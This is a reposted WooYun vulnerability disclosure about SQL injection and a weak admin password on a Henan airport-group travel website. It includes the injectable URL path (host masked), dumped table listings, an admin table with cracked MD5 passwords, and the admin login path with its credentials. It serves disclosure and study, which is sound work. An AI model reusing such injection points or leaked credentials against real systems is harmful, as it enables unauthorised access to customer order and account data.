某机场系统SQL注入导致后台数据泄露,后台弱口令,可任意修改订单,用户权限等

admin 2015年5月16日18:17:11评论307 views字数 254阅读0分50秒阅读模式
摘要

2014-08-08: 细节已通知厂商并且等待厂商处理中
2014-08-11: 厂商已经确认,细节仅向厂商公开
2014-08-21: 细节向核心白帽子及相关领域专家公开
2014-08-31: 细节向普通白帽子公开
2014-09-10: 细节向实习白帽子公开
2014-09-20: 细节向公众公开

漏洞概要 关注数(10) 关注此漏洞

缺陷编号: WooYun-2014-71227

漏洞标题: 某机场系统SQL注入导致后台数据泄露,后台弱口令,可任意修改订单,用户权限等

相关厂商: 河南省机场集团有限公司

漏洞作者: 不知道2017

提交时间: 2014-08-08 12:10

公开时间: 2014-09-20 12:12

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 10

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

1人收藏


漏洞详情

披露状态:

2014-08-08: 细节已通知厂商并且等待厂商处理中
2014-08-11: 厂商已经确认,细节仅向厂商公开
2014-08-21: 细节向核心白帽子及相关领域专家公开
2014-08-31: 细节向普通白帽子公开
2014-09-10: 细节向实习白帽子公开
2014-09-20: 细节向公众公开

简要描述:

妈妈说标题越长越吸引人。

详细说明:

河南航空旅游发展联盟网站有sql注入、后台弱口令等

**.**.**.**/Voyage.aspx?void=34

漏洞证明:

Database: lylm

[23 tables]

+---------------------------------------+

| buyinglist |

| newscategory |

| newsinfo |

| newsphotolist |

| ordersinfo |

| serchenewsinfo |

| serchtickets |

| serchuserorderinfos |

| serchuserrecord |

| shopinginfo |

| systemlog |

| t_adminsinfo |

| t_airline |

| t_friendlink |

| t_payingbanks |

| t_systemconfig |

| ticketbeginlevel |

| ticketinfo |

| ticketlevel |

| tickets |

| userlevels |

| userorders |

| usersinfo |

+---------------------------------------+

Database: information_schema

[28 tables]

+---------------------------------------+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| ENGINES |

| EVENTS |

| FILES |

| GLOBAL_STATUS |

| GLOBAL_VARIABLES |

| KEY_COLUMN_USAGE |

| PARTITIONS |

| PLUGINS |

| PROCESSLIST |

| PROFILING |

| REFERENTIAL_CONSTRAINTS |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

| SESSION_STATUS |

| SESSION_VARIABLES |

| STATISTICS |

| TABLES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+---------------------------------------+

Database: lylm

Table: t_adminsinfo

[3 entries]

+----------+-------------------------------------------+--------------+-------------+--------------+---------------------+----------------+---------------------+

| Admin_Id | Admin_Pwd | Admin_Name | Admin_Level | Admin_Status | Admin_AddDate | Admin_TrueName | Admin_LastLogintime |

+----------+-------------------------------------------+--------------+-------------+--------------+---------------------+----------------+---------------------+

| 6 | e10adc3949ba59abbe56e057f20f883e (123456) | admin456 | 0 | 0 | 2013-05-08 22:16:36 | 刘德华 | 2013-05-08 22:16:16 |

| 7 | e10adc3949ba59abbe56e057f20f883e (123456) | admin | 0 | 0 | 2013-05-09 08:36:43 | 河南旅游发展联盟 | 2014-08-06 09:33:07 |

| 8 | e10adc3949ba59abbe56e057f20f883e (123456) | enthusiastic | 0 | 0 | 2013-05-09 09:08:26 | <blank> | 2013-05-09 09:10:29 |

+----------+-------------------------------------------+--------------+-------------+--------------+---------------------+----------------+---------------------+

后台地址

http://**.**.**.**/AdminManager

登陆用户名admin 密码123456

某机场系统SQL注入导致后台数据泄露,后台弱口令,可任意修改订单,用户权限等

修复方案:

你懂的

版权声明:转载请注明来源 不知道2017@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-08-11 09:56

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT通报给民航局测评中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-08-06 12:26 | CoffeeSafe ( 普通白帽子 | Rank:142 漏洞数:37 )

    1

    你把爱情给了谁~

  2. 2014-08-06 12:32 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟,此号处于联盟托管中....)

    0

    有没有后悔?

  3. 2014-08-06 13:39 | 爱上平顶山 某机场系统SQL注入导致后台数据泄露,后台弱口令,可任意修改订单,用户权限等 ( 核心白帽子 | Rank:3144 漏洞数:625 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    1

    咦~~ 你啊

  4. 2014-08-06 13:40 | 不知道2017 ( 实习白帽子 | Rank:38 漏洞数:8 | 专注信息安全领域)

    1

    @爱上平顶山 嗯,我,呵呵

  5. 2014-08-07 02:50 | onpu ( 普通白帽子 | Rank:396 漏洞数:67 )

    1

    值得关注

  6. 2014-09-20 15:16 | Annabelle ( 实习白帽子 | Rank:56 漏洞数:17 | .)

    0

    注入点是sa咩?

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin